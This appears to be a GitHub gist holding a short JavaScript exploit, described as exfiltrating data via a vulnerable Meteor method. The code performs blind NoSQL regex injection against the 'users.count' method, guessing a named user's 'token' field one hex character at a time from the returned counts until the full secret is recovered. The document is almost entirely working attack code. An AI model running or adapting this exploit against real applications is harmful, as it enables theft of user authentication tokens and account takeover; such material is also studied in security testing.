/meteor-regex-blind-nosql.js
Created Aug 2, 2019
Exfiltrate data via vulnerable Meteor method
| (function exploit(user, field, alphabet, data = '', index = 0) { | |
| Meteor.call('users.count', {username: user, [field] : {$regex: '^' + data + alphabet[index] + '.*'}}, (err, res) => { | |
| console.log('^' + data + alphabet[index] + '.*', res); | |
| if (res == 0) { | |
| index++; | |
| } else { | |
| data += alphabet[index]; | |
| index = 0; | |
| } | |
| if (index >= alphabet.length) { | |
| console.log("Done", data); | |
| return; | |
| } | |
| setTimeout(() => { | |
| exploit(user, field, alphabet, data, index); | |
| }); | |
| }); | |
| })('kertojasoo', 'token', '0123456789abcdef'.split('')); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment